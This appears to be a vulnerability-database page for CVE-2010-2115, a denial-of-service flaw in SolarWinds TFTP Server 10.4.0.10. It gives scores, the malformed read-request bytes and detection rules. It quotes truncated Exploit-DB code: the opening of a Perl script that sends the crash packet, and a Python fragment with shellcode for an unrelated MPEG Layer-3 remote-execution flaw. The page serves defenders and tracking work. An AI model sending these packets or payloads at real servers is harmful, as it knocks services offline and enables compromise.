CVE-2010-2115
published 2010-05-28CVE-2010-2115: SolarWinds TFTP Server 10.4.0.10 allows remote attackers to cause a denial of service (no new connections) via a crafted read request.
PriorityP341medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
55.95%
98.9th percentile
SolarWinds TFTP Server 10.4.0.10 allows remote attackers to cause a denial of service (no new connections) via a crafted read request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | tftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x01\x01\x00NETASCII\x00
- →Detect a TFTP Read Request (opcode 0x0001) over UDP port 69 where the filename field is a single byte (0x01) followed by a null byte and the mode string 'NETASCII'. This malformed request with a single-byte filename triggers the DoS condition. ↗
- →Alert on TFTP 'netascii' read requests containing a specially crafted (abnormally short/single-byte) filename field targeting SolarWinds TFTP Server 10.4.0.10; the server will stop accepting new connections without crashing. ↗
- ·Affected version is specifically SolarWinds TFTP Server 10.4.0.10; scope of impact on other versions is not confirmed by available sources. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft MPEG Layer-3 - Remote Command Execution
exploitdb·2010-09-05·CVSS 9.3
CVE-2010-0480 [CRITICAL] Microsoft MPEG Layer-3 - Remote Command Execution
Microsoft MPEG Layer-3 - Remote Command Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
'''
fHTML = open('index.html', 'w')
fHTML.write(strHTML)
fHTML.close()
fdR = open('exploit.dll', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:1380]
str2 = strTotal[2115:]
shellcode = '\xEB\x6B\x5A\x31\xC9\x6A\x10\x52\x42\x52\x51\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xFF\xD7\x50\x68\xA8\xA2\x4D\xBC\xFF\xD6\xE8\xDA\xFF\xFF\xFF\x00\x54\x68\x65\x20\x65\x78\x70\x6C\x6F\x69\x74\x20\x77\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x21\x00\x5E\x6A\x30\x59\x64\x8B\x19\x8B\x5B\x0C\x8B\x5B\x1C\x8B\x1B\x8B\x5B\x08\x53\x68\x8E\x4E\x0E\xEC\xFF\xD6\x89\xC7\xE8\xB3\xFF\xFF\xFF\x55\x53\x45\x52\x33\x
Exploit-DB
SolarWinds TFTP Server 10.4.0.10 - Denial of Service
exploitdb·2010-05-21
CVE-2010-2115 SolarWinds TFTP Server 10.4.0.10 - Denial of Service
SolarWinds TFTP Server 10.4.0.10 - Denial of Service
---
# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code :
#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k
use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$really=
"\x00\x01". # Opcode 1 = Read Request
"\x01". # The crash....no really thats it
"\x00". # Null byte
"NET
Metasploit
SolarWinds TFTP Server 10.4.0.10 Denial of Service
metasploit
SolarWinds TFTP Server 10.4.0.10 Denial of Service
SolarWinds TFTP Server 10.4.0.10 Denial of Service
The SolarWinds TFTP server can be shut down by sending a 'netascii' read request with a specially crafted file name.
No writeups or analysis indexed.
2010-05-28
Published